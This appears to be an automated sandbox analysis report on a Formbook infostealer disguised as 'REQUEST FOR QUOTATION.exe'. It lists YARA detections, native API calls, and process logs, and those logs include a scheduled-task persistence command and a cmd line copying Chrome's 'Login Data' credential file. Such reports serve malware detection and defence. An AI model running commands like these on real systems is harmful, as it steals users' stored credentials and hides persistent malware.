            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: REQUEST FOR QUOTATION.exe
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_0041A060 NtClose,5_2_0041A060
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_0041A110 NtAllocateVirtualMemory,5_2_0041A110
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_00419F30 NtCreateFile,5_2_00419F30
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_00419FE0 NtReadFile,5_2_00419FE0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_0041A05A NtClose,5_2_0041A05A
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_0041A10A NtAllocateVirtualMemory,5_2_0041A10A
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_00419EEA NtCreateFile,5_2_00419EEA
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_00419F2A NtCreateFile,5_2_00419F2A
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_00419F84 NtCreateFile,NtReadFile,5_2_00419F84
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9540 NtReadFile,LdrInitializeThunk,8_2_051F9540
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9560 NtWriteFile,LdrInitializeThunk,8_2_051F9560
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F95D0 NtClose,LdrInitializeThunk,8_2_051F95D0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9710 NtQueryInformationToken,LdrInitializeThunk,8_2_051F9710
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9770 NtSetInformationFile,LdrInitializeThunk,8_2_051F9770
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9780 NtMapViewOfSection,LdrInitializeThunk,8_2_051F9780
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9FE0 NtCreateMutant,LdrInitializeThunk,8_2_051F9FE0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9610 NtEnumerateValueKey,LdrInitializeThunk,8_2_051F9610
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9650 NtQueryValueKey,LdrInitializeThunk,8_2_051F9650
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_051F9660
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F96D0 NtCreateKey,LdrInitializeThunk,8_2_051F96D0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F96E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_051F96E0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_051F9910
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F99A0 NtCreateSection,LdrInitializeThunk,8_2_051F99A0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9840 NtDelayExecution,LdrInitializeThunk,8_2_051F9840
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9860 NtQuerySystemInformation,LdrInitializeThunk,8_2_051F9860
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9A50 NtCreateFile,LdrInitializeThunk,8_2_051F9A50
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051FAD30 NtSetContextThread,8_2_051FAD30
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9520 NtWaitForSingleObject,8_2_051F9520
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F95F0 NtQueryInformationFile,8_2_051F95F0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051FA710 NtOpenProcessToken,8_2_051FA710
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9730 NtQueryVirtualMemory,8_2_051F9730
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051FA770 NtOpenThread,8_2_051FA770
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9760 NtOpenProcess,8_2_051F9760
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F97A0 NtUnmapViewOfSection,8_2_051F97A0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9670 NtQueryInformationProcess,8_2_051F9670
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9950 NtQueueApcThread,8_2_051F9950
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F99D0 NtCreateProcessEx,8_2_051F99D0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9820 NtEnumerateKey,8_2_051F9820
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051FB040 NtSuspendThread,8_2_051FB040
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F98A0 NtWriteVirtualMemory,8_2_051F98A0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F98F0 NtReadVirtualMemory,8_2_051F98F0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9B00 NtSetValueKey,8_2_051F9B00
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051FA3B0 NtGetContextThread,8_2_051FA3B0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9A10 NtQuerySection,8_2_051F9A10
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9A00 NtProtectVirtualMemory,8_2_051F9A00
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9A20 NtResumeThread,8_2_051F9A20
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F9A80 NtOpenDirectoryObject,8_2_051F9A80
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0323A110 NtAllocateVirtualMemory,8_2_0323A110
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0323A060 NtClose,8_2_0323A060
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03239F30 NtCreateFile,8_2_03239F30
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03239FE0 NtReadFile,8_2_03239FE0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0323A10A NtAllocateVirtualMemory,8_2_0323A10A
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0323A05A NtClose,8_2_0323A05A
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03239F2A NtCreateFile,8_2_03239F2A
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03239F84 NtCreateFile,NtReadFile,8_2_03239F84
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03239EEA NtCreateFile,8_2_03239EEA
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_018AA5381_2_018AA538
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_018A668F1_2_018A668F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_018A66A01_2_018A66A0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_018A664B1_2_018A664B
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_018ACE101_2_018ACE10
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CB5C21_2_058CB5C2
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CBE791_2_058CBE79
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC5891_2_058CC589
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC4E91_2_058CC4E9
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC44F1_2_058CC44F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC7791_2_058CC779
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC6D91_2_058CC6D9
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC1D81_2_058CC1D8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC1381_2_058CC138
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC09B1_2_058CC09B
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC3B21_2_058CC3B2
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC3121_2_058CC312
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC2781_2_058CC278
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC9F41_2_058CC9F4
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC9541_2_058CC954
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC8B91_2_058CC8B9
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CC8191_2_058CC819
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CCB2B1_2_058CCB2B
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CCA8E1_2_058CCA8E
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CBFFB1_2_058CBFFB
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CBF5B1_2_058CBF5B
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 1_2_058CBEC11_2_058CBEC1
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_0041E8085_2_0041E808
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_004010305_2_00401030
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_0041DB0B5_2_0041DB0B
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_0041EB2D5_2_0041EB2D
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_0041E3C05_2_0041E3C0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_0041D3DE5_2_0041D3DE
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_0041DC1F5_2_0041DC1F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_0041DD6F5_2_0041DD6F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_00402D875_2_00402D87
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_00402D905_2_00402D90
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_00409E305_2_00409E30
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_0041D7055_2_0041D705
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeCode function: 5_2_00402FB05_2_00402FB0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05282D078_2_05282D07
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051B0D208_2_051B0D20
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05281D558_2_05281D55
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051E25818_2_051E2581
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052825DD8_2_052825DD
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051CD5E08_2_051CD5E0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051C841F8_2_051C841F
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0527D4668_2_0527D466
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05281FF18_2_05281FF1
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0528DFCE8_2_0528DFCE
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051D6E308_2_051D6E30
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0527D6168_2_0527D616
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05282EF78_2_05282EF7
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051BF9008_2_051BF900
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051D41208_2_051D4120
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0528E8248_2_0528E824
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052710028_2_05271002
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051DA8308_2_051DA830
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052820A88_2_052820A8
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051CB0908_2_051CB090
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051E20A08_2_051E20A0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052828EC8_2_052828EC
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05282B288_2_05282B28
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051DAB408_2_051DAB40
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051EEBB08_2_051EEBB0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0527DBD28_2_0527DBD2
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052703DA8_2_052703DA
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0526FA2B8_2_0526FA2B
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052822AE8_2_052822AE
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0323DB008_2_0323DB00
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0323E3C08_2_0323E3C0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0323D3DE8_2_0323D3DE
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0323E8088_2_0323E808
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03222FB08_2_03222FB0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03229E308_2_03229E30
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0323DD6F8_2_0323DD6F
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03222D878_2_03222D87
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03222D908_2_03222D90
            Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 051BB150 appears 54 times
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.671960019.0000000006D10000.00000002.00000001.sdmpBinary or memory string: originalfilename vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.671960019.0000000006D10000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.666776546.0000000000F78000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISymbolReader.exe8 vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.671747910.0000000006C10000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.670861847.00000000058B0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe, 00000005.00000002.710461060.00000000012AF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe, 00000005.00000002.711571251.0000000001693000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe, 00000005.00000002.709469179.0000000000828000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISymbolReader.exe8 vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exeBinary or memory string: OriginalFilenameISymbolReader.exe8 vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/9@8/3
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeFile created: C:\Users\user\AppData\Roaming\JzXynzIhLqqy.exeJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeMutant created: \Sessions\1\BaseNamedObjects\uqQPXEaOhupEdXy
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_01
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9ADB.tmpJump to behavior
            Source: REQUEST FOR QUOTATION.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: REQUEST FOR QUOTATION.exeVirustotal: Detection: 28%
            Source: REQUEST FOR QUOTATION.exeReversingLabs: Detection: 14%
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeFile read: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe 'C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe'
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: